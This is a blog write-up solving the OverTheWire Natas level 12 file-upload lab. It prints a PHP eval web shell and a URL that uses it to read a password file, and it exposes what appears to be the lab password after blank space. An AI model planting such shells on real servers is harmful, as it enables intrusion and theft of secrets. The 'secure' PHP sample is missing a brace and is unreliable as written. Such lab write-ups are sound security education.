Skip to main content

Natas Level 12 Writeup: File Upload Vulnerability

 

1. Objective

Find the password for natas level 13.

2. Introduction

The first thing we see is a form that gives us the ability to upload 'JPEG' images. 

 

If proper checks have not been put in place to validate the uploaded file, it is highly likely that we may have a File Upload Vulnerability. 

A File Upload Vulnerability is a security issue that arises when proper checks are not implemented to validate uploaded files. In this level, we explore the possibility of exploiting such a vulnerability.


3. Exploration

Let's use the 'View source code' button to check what clues we can find there.

Level 12 Source

The process that takes place on the server.

  • A file name is generated before the page is served to the user
  • The filename is stored in a hidden field called filename
  • When a user uploads a file, the server checks if the filename field is present
  • It prepares for the file to be saved in the upload folder
  • Check if the size of the file is greater than 1000 bytes
    • Reject the file if it is greater than the limit
    • Otherwise upload it to the uploads folder

We notice that the only check that is performed is on the file is the size. No checks are made to ensure that we only upload jpeg files. That means we can upload whatever file type we want including php files and the server won't block it. Also, the file name to be used is passed to the client side, which means we can modify it to ensure our file is saved as php file 


4. Crafting a php file

We will use a simple php exploit code

 <?php echo eval($_GET['code']); ?>
  • Enter the code above and save it in a php file
  • Go to the form and select the php file
  • Right click on the page and select inspect
  • Change the value of the hidden field filename to something with a php extension, like shell.php

 


  • Our file has been uploaded



  • Click on the link to open the php file

     


  • Change the url to this to read the file with the password for natas13
    http://natas12.natas.labs.overthewire.org/upload/n60np7ud5p.php?code=cat%20/etc/natas_webpass/natas13


5. Success

With this, we have gained a basic understanding of File upload vulnerabilities and how to exploit it.

Use the password that you have acquired above to access the next level.

7. Preventing file upload vulnerabilities

Checking the file size is a good place to start to prevent file upload vulnerabilities but that alone is not enough. It is important to also ensure that the correct file type is being submitted to the server. 

This can be done by:

  • Checking the extension  
  • Checking the mime type
  • Checking magic numbers

 

Here is php code that is potentially more secure than what we had on this level  

 

<?php
    function isSafeMimeType($file)
    {
        $allowedMimeTypes = ['image/jpeg'];
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        $mimeType = finfo_file($finfo, $file);
        finfo_close($finfo);

        return in_array($mimeType, $allowedMimeTypes);
    }

    function isSafeMagicNumber($file)
    {
        // Magic numbers for JPEG files
        $jpegMagicNumbers = ['FFD8FFDB','FFD8FFE0','FFD8FFE1', 'FFD8FFE2',]; // Add more if needed
        $fileContents = file_get_contents($file);
        $fileMagicNumber = strtoupper(bin2hex(substr($fileContents, 0, 4)));

        return in_array($fileMagicNumber, $jpegMagicNumbers);
    }

    if (array_key_exists("filename", $_POST)) {
        $uploadDirectory = "upload"; // Your upload directory path

        // File Type Validation
        if (!isSafeMimeType($_FILES['uploadedfile']['tmp_name'])) {
            echo "Invalid file type. Only JPEG files are allowed.";
            return;
        }

        // File Size Validation
        $maxFileSize = 1000000; // 1 MB
        if ($_FILES['uploadedfile']['size'] > $maxFileSize) {
            echo "File is too big. Maximum allowed size is 1 MB.";
            return;
        }

        // File Name Security
        $filename = pathinfo($_POST["filename"], PATHINFO_FILENAME);
        $filename = preg_replace("/[^A-Za-z0-9_]/", '_', $filename);

        // Magic Number Validation
        if (!isSafeMagicNumber($_FILES['uploadedfile']['tmp_name'])) {
            echo "Invalid file content.";
            return;
        }

        $targetPath = makeRandomPathFromFilename($uploadDirectory, $filename);

        if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $targetPath)) {
            echo "The file <a href=\"{$targetPath}\">{$targetPath}</a> has been uploaded";
       
        else {
            echo "There was an error uploading the file, please try again!";
        }
}
?> 

NthApostle

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9



Labels:

Comments

Post a Comment

Popular posts from this blog

Natas Level 11 Writeup: XOR Encryption

1. Objective Find the password for natas level 12. 2. Introduction When we open the webpage for Natas 11, we are greeted with the following message: Cookies are protected with XOR encryption. What is XOR: XOR is a binary operation that returns true (1) only when the number of true inputs is odd. It compares corresponding bits of two binary numbers, resulting in 1 for differing bits and 0 for identical bits. Example: Let's consider two binary numbers, A = 1010 and B = 1101. 1010 X 1101 ------- 0111 In this case, A XOR B equals 0111 in binary, or 7 in decimal. XOR Property: If A XOR B = C, then A XOR C = B. Verification: Let A = 1010, C = 0111, and find B. 1010 X 0111 ------- 1101 The result is 1101 in binary, which is B. So, A XOR C equals B, confirming the XOR property. This property holds true for any combination of A, B, and C, demonstrating that given any two values, you can find the third using XOR. 3. Exploration Ch...
Post a Comment
Read more

Natas Level 14 Writeup: SQL Injection

1. Objective  Find the password for natas level 15. URL: http://natas14.natas.labs.overthewire.org   2. Introduction After opening the webpage, we see a login form. We need to get the correct credentials or somehow bypass the login page in order to proceed to the next level.   3. Exploration Clicking on the View sourcecode link we are able to view the logic of the server side code. The following code snippet is used to query the database to check if the username and password are valid $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\""; However, we immediately notice that the input is not being sanitized and is being used directly in the query via string concatenation. These shows us that there is potential for sq injection        SQL injection is a cyber attack that exploits vulne...
Post a Comment
Read more

Natas Level 7 Writeup: Directory Traversal

  URL: http://natas7.natas.labs.overthewire.org Open the Website : Exploration : Page Navigation: Clicking on the "home" and "about" pages reveals the following links: http://natas7.natas.labs.overthewire.org/index.php?page=home http://natas7.natas.labs.overthewire.org/index.php?page=about Hint in Source Code: Inspecting the source code provides a hint about how the application includes pages. Exploit : URL Parameter Manipulation: Replace the page parameter with the desired file path: http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8   Success : You have successfully manipulated the URL parameter to access the password for natas8. Proceed to the next level using the acquired information.   PS: In Natas0, it was stated that    All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5 That is how we know that the file...
Post a Comment
Read more